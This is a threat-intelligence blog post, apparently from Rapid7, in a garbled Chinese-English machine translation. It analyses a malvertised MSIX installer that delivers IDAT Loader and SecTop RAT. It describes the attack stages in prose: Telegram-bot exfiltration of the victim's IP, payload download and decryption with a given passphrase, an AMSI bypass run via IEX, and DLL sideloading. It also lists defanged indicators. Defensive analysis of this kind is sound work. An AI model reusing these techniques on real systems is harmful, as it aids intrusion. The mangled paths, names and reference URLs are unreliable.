最后更新于2024年4月10日(星期三)14:32:16 GMT

Rapid7的管理检测和响应(MDR)团队持续监控客户的环境, identifying emerging threats and developing new detections.

In August 2023, Rapid7 identified a new malware loader named the IDAT Loader. 恶意软件加载程序是一种恶意软件,旨在向受害者的系统传递和执行额外的恶意软件. IDAT Loader的独特之处在于它从PNG文件中检索数据的方式, searching for offsets beginning with 49 44 41 54 (idat).

在我们的博客系列的第一部分, 我们讨论了如何使用基于Rust的应用程序来下载和执行IDAT Loader. 在本系列的第二部分中, 我们将分析MSIX安装程序如何导致IDAT加载程序的下载和执行.

威胁行为者利用MSIX包来分发恶意代码并不是什么新鲜事, what distinguished this incident was the attack flow of the compromise. 根据最近的战术, 技术和程序观察(TTPs), 我们认为这些活动与有经济动机的威胁组织有关.

图1 -攻击流

MSIX安装程序

2024年1月,红金丝雀 发布文章 将不同的威胁行为归因于恶意MSIX安装程序的各种部署. MSIX安装人员采用了多种技术将初始有效载荷传送到受损系统.

所有感染都始于用户在使用搜索引擎查找特定软件包下载后导航到错别字的url. 拼写错误抢注又名URL劫持是一种特定的技术,威胁行为者通过注册与合法域名非常相似的域名来欺骗用户. 威胁行为者模仿合法网站的布局,以引诱用户下载他们的初始有效载荷.

Additionally, threat actors utilize a technique known as SEO poisoning, 使威胁行为者能够确保他们的恶意网站出现在用户搜索结果的顶部附近.

技术分析

错别字误用广告

In our most recent incident involving the IDAT Loader, Rapid7观察到一个用户从一个冒充合法网站的网站下载一个名为“Room Planner”的应用程序的安装程序. 用户在Google上搜索“Room Planner”应用程序并点击了URL hxxps: / / roomplannerapp.cn[.]com. 在用户交互后,用户浏览器被引导下载一个MSIX包, Room_Planner-x86.msix (SHA256: 6f350e64d4efbe8e2953b39bfee1040c8b041f6f212e794214e1836561a30c23).

Figure 2 - Malvertised Site for Room Planner Application

PowerShell脚本

执行期间 the MSIX file, a PowerShell script, 1.ps1 ,被放入文件夹路径中 C:\Program Files\ WindowsApps \ RoomPlanner.RoomPlanner_7.2.0.0 _x86__s3garmmmnyfa0 \ and executed. Rapid7确定它做以下事情:

  • Obtain the IP address of the compromised asset
  • Send the IP address of the compromised asset to a Telegram bot
  • Retrieve an additional PowerShell script that is hosted on the Telegram bot
  • Delete the message containing the IP address of the compromised asset
  • Invoke the PowerShell script retrieved from the Telegram bot

图3 - PowerShell脚本.ps1 contained within MSIX file Room_Planner-x86.msix

在受控环境中, Rapid7访问了托管下一阶段PowerShell脚本的Telegram bot,并确定它做了以下事情:

  • 使用从域icanhazip[]中检索数据的Invoke-RestMethod来检索受损资产的IP地址。.]com
  • Enumerate the compromised assets Operating System, domain and AV products
  • 把信息发送给Telegram机器人
  • 创建一个随机生成的8个字符的名称,并将其分配给变量$JAM
  • 从URL下载gpg文件 hxxps: / / read-holy-quran [.]group/ld/cr.tar.gpg,将文件保存为%APPDATA%,并将其保存为分配给$JAM变量的名称
  • Decrypt the contents of the gpg file using the passphrase ‘riudswrk’, saving them into a newly created folder named after the $JAM variable within C: \ ProgramData \ cr \ \ $堵塞 as a .RAR归档文件
  • 使用tar解压RAR文件
  • 启动一个名为run的可执行文件.从新创建的文件夹中删除
  • Create a link (.链接)文件在启动文件夹, named after the randomly generated name stored in variable $JAM, 指向奔跑.Exe存储在文件路径中 C: \ ProgramData \ cr \ \ $堵塞 为了创造恒心
  • Read in another PowerShell script hosted on a Pastebin site, hxxps: / / pastebin.pl /视图/生/ a137d133 using downloadstring 并执行其内容(PowerShell脚本是一种用于绕过AMSI的工具) IEX (Invoke-Expression)
  • 从URL下载数据 hxxps: / / kalpanastickerbindi [.]com/1.jpg 反思性地加载内容,并从函数EntryPoint(表示下载的数据是a)开始执行程序 .. NET汇编二进制文件)

图4 - API Bot托管PowerShell脚本

图5 - PowerShell AMSI旁路工具

After analysis of the AMSI (Anti Malware Scan Interface) bypass tool, we observed that it was a custom tool giving credit to a website, hxxps: / / rastamosue [.] memory-patching-amsi-bypass, which discusses how to create a program that can bypass AMSI scanning.

AMSI是一种扫描工具,用于在脚本引擎试图运行脚本后扫描脚本,以查找潜在的恶意代码. 如果内容被认为是恶意的, AMSI将告诉脚本引擎(在本例中是PowerShell)不要运行代码.

RAR Contents

Contained within the RAR file were the following files:

Files Description
Dharna.7z File contains the encrypted IDAT Loader config
Guar.xslx File contains random bytes, not used during infection
Run.exe Renamed WebEx executable file, used to sideload DLL WbxTrace.dll
Msvcp140.dll 运行读取良性DLL.exe
PtMgr.dll 运行读取良性DLL.exe
Ptusredt.dll 运行读取良性DLL.exe
Vcruntime140.dll 运行读取良性DLL.exe
Wbxtrace.dll 包含IDAT加载器的WebEx DLL已损坏
WCLDll.dll 良性WebEx DLL读取运行.exe

在对文件夹内容进行分析后,Rapid7确定其中一个dll, wbxtrace.dll的签名已损坏,表明其原始代码已被篡改. 在分析修改后的WebEx DLL后, wbxtrace.dll, Rapid7确定DLL包含类似IDAT Loader的可疑功能.

Figure 6 - Analysis showing Corrupt Signature of wbxtrace.dll

Upon extracting the contents of the RAR file to the directory path C:\ProgramData\cr, PowerShell脚本执行 run.exe executable.

The IDAT Loader

执行期间 run.exe (一个合法的重命名的WebEx可执行文件),可执行文件附带加载被篡改的WebEx DLL, wbxtrace.dll. Once the DLL wbxtrace.dll is loaded, the DLL executes a section of new code containing the IDAT Loader, 哪个从内部读取内容 dharna.7z.

阅读后的内容从 dharna.7z, IDAT加载程序搜索偏移量 49 44 41 54 (idat) followed by C6 A5 79 EA. After locating this offset, the loader reads in the following 4 bytes, E1 4E 91 99,用作解密其余内容的解密密钥. Contained within the decrypted contents are additional code, 特定的DLL和可执行文件路径,以及使用200字节异或密钥解密的最终加密有效负载.

The IDAT loader employs advanced techniques such as 过程Doppelganging and the 天门术 in order to initiate new processes and inject additional code. 此策略使加载程序能够逃避反病毒检测并成功加载最后阶段, SecTop RAT 在新创建的过程中, msbuild.exe.

我们最近开发了一个配置提取器,它能够解密隐藏在包含 伊达(49 44 41 54) sections. The configuration extractor can be found on our Rapid7 Labs github page.

After using the configuration extractor, we analyzed the SecTop RAT and determined that it communicates with the IP address 91.215.85[.]66.

Rapid7客户

通过Rapid7扩展的检测规则库,insighttidr和管理检测和响应客户已经拥有了现有的检测覆盖范围. Rapid7建议在所有适用的主机上安装Insight Agent,以确保对可疑进程的可见性和适当的检测覆盖率. 以下是部署的检测和对所描述的活动发出警报的非详尽列表:

  • 攻击者技术-高级安装程序 .MSI可执行程序生成Powershell
  • Suspicious Process - Execution From Root of ProgramData
  • Suspicious Process - PowerShell Uncommon Upper And Lower Case Combinations
  • 可疑进程-浏览器.exe在非标准位置

MITRE ATT&CK Techniques

Tactics Techniques Details
Execution Command and Scripting Interpreter: PowerShell (T1059.001) 1.ps1用于识别受感染的机器并执行额外的PowerShell脚本
Execution 本地API (T1106) IDAT注入器和IDAT装载机使用天堂之门技术逃避检测
Execution 用户执行:恶意文件(T1204.002) 用户执行二进制Room_Planner-x86.msix
Defense Evasion Masquerading: Match Legitimate Name or Location (T1036.005) Malicious MSIX masquerades as legitimate Room Planner installer
Defense Evasion Deobfuscate/Decode Files or Information (T1140) gpg.用于解密cr.tar.gpg
Defense Evasion Hijack Execution Flow: DLL Search Order Hijacking (T1574.001) run.Exe加载恶意的wbxtrace.dll
Defense Evasion 反射代码加载(T1620) PowerShell script loads a binary hosted at kalpanastickerbindi [.]com/1.jpg
Defense Evasion 工艺注入(T1055) IDAT注入器实现NtCreateSection + NtMapViewOfSection代码注入技术注入到cmd.exe process
Defense Evasion Process Injection: 过程Doppelganging (T1055.013) IDAT loader implements 过程Doppelganging technique to load the SecTop RAT
Defense Evasion Virtualization/Sandbox Evasion: Time Based Evasion (T1497.003) Execution delays are performed by several stages throughout the attack flow

IOCs

IOC Sha256 Notes
Room_Planner-x86.msix 6f350e64d4efbe8e2953b39bfee1040c8b041f6f212e794214e1836561a30c23 Initial installer containing PowerShell scripts
1.ps1 928bd805b924ebe43169ad6d670acb2dfe45722e17d461ff0394852b82862d23 由Room_Planner-x86删除并执行.msix
wbxtrace.dll 1D0DAF989CF28852342B1C0DFEE05374860E1300106FF7788BBA26D84549B845 恶意DLL执行运行.重命名的Cisco Webex二进制文件
Dharna.7z B7469153DC92BF5DE9BF2521D9550DF21BC4574D0D0CFC919FF26D1071C000B2 由wbxtrace解密的加密负载.dll
read-holy-quran [.]group/ld/cr.tar.gpg 主机包含RAR文件的GPG文件
kalpanastickerbindi [.]com/1.jpg Hosts .NET executable downloaded from API Bot PowerShell script
91.215.85[.]66 SecTop RAT域

References

Article URL
MSIX installer malware delivery on the rise across multiple campaigns http://redcanary.com/blog/msix-installers/
过程Doppelganging http://malware.news/t/uncovering-the-serpent/76253
《ladbrokes立博中文版》解析(上) http://sachiel-archangel.medium.com/analysis-of-heavens-gate-part-1-62cca0ace6f0
Fake Update Utilizes New IDAT Loader To Execute StealC and Lumma Infostealers http://n5sw.freeonlinekitchendesigntool.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/
Stories from the SOC Part 1: IDAT Loader to BruteRatel http://n5sw.freeonlinekitchendesigntool.com/blog/post/2024/03/28/stories-from-the-soc-part-1-idat-loader-to-bruteratel/